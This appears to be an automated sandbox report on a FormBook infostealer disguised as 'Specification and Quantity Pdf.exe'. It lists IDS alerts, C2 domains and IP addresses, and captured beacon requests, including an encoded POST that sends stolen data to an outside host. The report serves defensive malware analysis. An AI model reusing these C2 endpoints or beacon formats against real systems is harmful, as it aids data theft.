          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49716 -> 78.46.88.140:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49716 -> 78.46.88.140:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49716 -> 78.46.88.140:80
          Source: Network trafficSuricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.7:49714 -> 23.227.38.74:80
          Source: Network trafficSuricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.7:49715 -> 203.161.60.191:80
          Source: Network trafficSuricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.7:49717 -> 78.46.88.140:80
          Source: C:\Windows\explorer.exeNetwork Connect: 203.161.60.191 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: Malware configuration extractorURLs: www.playdoapp.online/n7ak/
          Source: global trafficHTTP traffic detected: GET /n7ak/?OrT4vp=D48xOFEPf6J&nrCxNDk=X95XYDcr/0ovQl8dFDDB2DmtDdbecE+v1errdqyRv2syAHM7RuOPKheDNorHxKs8v8dmbSYlDw== HTTP/1.1Host: www.tuktukwines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 8_2_10A47F82 getaddrinfo,setsockopt,recv,8_2_10A47F82
          Source: global trafficHTTP traffic detected: GET /n7ak/?OrT4vp=D48xOFEPf6J&nrCxNDk=X95XYDcr/0ovQl8dFDDB2DmtDdbecE+v1errdqyRv2syAHM7RuOPKheDNorHxKs8v8dmbSYlDw== HTTP/1.1Host: www.tuktukwines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.supremeajock.biz
          Source: global trafficDNS traffic detected: DNS query: www.1690.biz
          Source: global trafficDNS traffic detected: DNS query: www.ancientshadowguilt.space
          Source: global trafficDNS traffic detected: DNS query: www.maximsboutique.com
          Source: global trafficDNS traffic detected: DNS query: www.tuktukwines.com
          Source: global trafficDNS traffic detected: DNS query: www.playdoapp.online
          Source: global trafficDNS traffic detected: DNS query: www.taxuw.com
          Source: global trafficDNS traffic detected: DNS query: www.jam-nins.com
          Source: global trafficDNS traffic detected: DNS query: www.sdnaqianchuan.com
          Source: global trafficDNS traffic detected: DNS query: www.parkpeninsula.online
          Source: global trafficDNS traffic detected: DNS query: www.395boulderbrookdr.com
          Source: global trafficDNS traffic detected: DNS query: www.volkovastyu.com
          Source: unknownHTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.tuktukwines.comConnection: closeContent-Length: 133153Cache-Control: no-cacheOrigin: http://www.tuktukwines.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tuktukwines.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6e 72 43 78 4e 44 6b 3d 66 66 31 74 47 6c 55 67 7e 69 6c 34 62 48 4d 70 66 7a 53 41 6e 31 4b 57 58 4e 7a 38 54 30 76 76 73 36 36 4c 59 49 32 76 68 7a 59 57 48 6a 59 78 44 4d 6a 64 4d 33 66 59 59 6f 28 59 7e 65 67 66 75 36 78 39 5a 42 6f 45 48 4b 55 69 62 44 28 63 57 41 63 4f 52 67 4e 67 32 4d 38 33 39 39 4b 50 44 33 7e 4f 62 48 6b 42 70 75 49 56 79 30 4a 4f 4c 61 72 4d 7e 78 48 44 71 37 61 38 45 32 6f 33 44 4a 46 78 48 79 30 76 63 4f 52 72 7a 72 6d 63 37 50 45 66 70 53 65 2d 61 48 63 4e 44 72 6a 39 70 38 45 41 4c 33 73 50 32 69 4a 4e 67 4f 61 59 36 4e 7e 33 36 6b 64 75 52 55 43 39 42 66 61 43 72 62 38 67 36 72 56 73 42 69 62 71 37 61 6d 4d 70 4c 7e 64 6b 37 37 77 45 54 68 44 33 6a 62 58 35 43 46 4c 6d 6a 62 79 36 6a 4b 63 6b 6b 31 32 71 70 34 4a 69 51 59 6e 4e 6d 30 69 59 43 43 52 36 43 69 67 62 4c 42 30 47 55 36 66 73 76 74 61 5a 58 7a 41 79 59 5a 31 63 54 4d 64 34 66 50 49 30 41 48 51 33 44 4f 54 70 77 48 47 74 31 55 56 32 73 7a 31 48 78 57 6c 42 4f 75 46 43 6e 4d 70 39 75 36 55 48 72 41 77 7a 4b 39 47 44 49 37 4e 43 6c 4a 43 4c 66 49 79 4e 68 51 59 55 6a 6d 59 6b 57 64 6f 28 6d 63 79 45 61 61 78 54 5a 58 64 6a 36 69 37 76 58 46 70 69 63 48 74 72 31 74 56 41 56 42 74 71 73 6c 32 41 4d 50 4b 74 6d 66 75 67 32 77 5a 30 6c 76 4c 64 70 6a 46 77 74 32 4c 30 77 64 74 46 58 58 52 33 53 68 65 67 4e 6b 4c 37 31 6f 4c 76 38 79 35 64 51 64 2d 32 46 33 33 4e 67 4b 2d 68 72 33 76 66 38 32 30 55 39 49 72 6f 4a 5a 78 65 4c 4b 2d 37 45 46 6e 74 62 44 73 7e 4e 70 6f 68 2d 34 39 6b 7a 72 51 44 69 31 72 67 68 50 66 54 52 45 35 49 48 65 41 42 73 76 6d 54 57 42 6a 6f 76 7a 51 57 74 74 4e 39 48 70 53 59 63 4a 6e 4c 33 42 45 33 38 7e 43 53 71 47 34 44 6f 4f 48 69 55 51 58 62 65 34 4d 35 6a 77 56 45 45 6c 43 6b 33 55 47 55 54 30 5f 28 6d 66 67 38 6f 50 49 51 63 6c 6a 51 39 7a 64 67 7a 36 71 66 70 31 47 63 69 7a 6d 76 65 36 72 28 44 4f 67 59 35 6a 7a 55 36 78 42 58 52 6b 6e 4f 44 38 62 58 6e 6d 57 6b 6e 30 4f 49 53 64 4d 73 43 37 38 4b 54 71 35 41 71 7a 6d 44 56 6e 79 78 73 72 43 6a 54 61 74 4a 46 68 37 4e 4f 57 63 79 42 53 34 72 32 72 4e 74 6c 54 56 57 49 58 74 62 77 57 4d 33 4e 6e 5a 66 59 6a 4e 38 50 49 64 51 41 31 71 6b 76 36 36 56 53 34 4a 28 71 44 41 76 62 54 73 52 62 42 76 46 71 6a 53 30 64 51 65 5a 64 53 52 4e 55 39 44 43 51 4e 34 67 69 75 32 58 38 36 46 61 35 33 7a 66 4a 62 52 41 61 4c 6f 65 38 61 69 70 42 49 78 4a 59 76 39 38 70 56 4f 4c 38 71 62 57 72 53 77 36 69 30 75 71 6a 39 30 39 76 4d 36 36 6b 56 2d 59 30 48 61 4f 59 57 54 64 2d 74 6f 74 39 73 61 45 78 75 54 54 35 31 47 74 4f 76 59 62 56 61 72 63 4e 61 33 76 2d 28 30 77 79 30 6a 54 36 30 5f 52 58 6e
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Sep 2024 15:27:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 22 Sep 2024 15:27:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0FTsUAvKwEiZ3xh83g5%2Bv7bxN7oDtcOzSHFadiDKrLUdGKPZQGQ1Ifpo7oz9NVXw6uVe522O4MgjOch%2B9OFYWkh3OF1hnImFLmJLtOul4hBc8ERIJKi5BDDYp91oN3n7as01VA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=15.000105X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8c7351583c871895-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta ht
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Sep 2024 15:27:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sun, 22 Sep 2024 15:27:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0FTsUAvKwEiZ3xh83g5%2Bv7bxN7oDtcOzSHFadiDKrLUdGKPZQGQ1Ifpo7oz9NVXw6uVe522O4MgjOch%2B9OFYWkh3OF1hnImFLmJLtOul4hBc8ERIJKi5BDDYp91oN3n7as01VA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=15.000105X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8c7351583c871895-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta ht
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
          Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
          Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
          Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
          Source: explorer.exe, 00000008.00000003.3081808656.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1317815671.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
          Source: explorer.exe, 00000008.00000002.3757019252.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3757051440.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3756253250.0000000007C70000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1690.biz
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1690.biz/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1690.biz/n7ak/www.ancientshadowguilt.space
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.1690.bizReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.395boulderbrookdr.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.395boulderbrookdr.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.395boulderbrookdr.com/n7ak/www.volkovastyu.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.395boulderbrookdr.comReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ancientshadowguilt.space
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ancientshadowguilt.space/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ancientshadowguilt.space/n7ak/www.maximsboutique.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ancientshadowguilt.spaceReferer:
          Source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: explorer.exe, 00000008.00000002.3754644999.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gameofgem.com
          Source: explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gameofgem.com/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gameofgem.comReferer:
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goodstuff.tv
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goodstuff.tv/n7ak/
          Source: explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.goodstuff.tv/n7ak/www.thehandycrewcompany.com
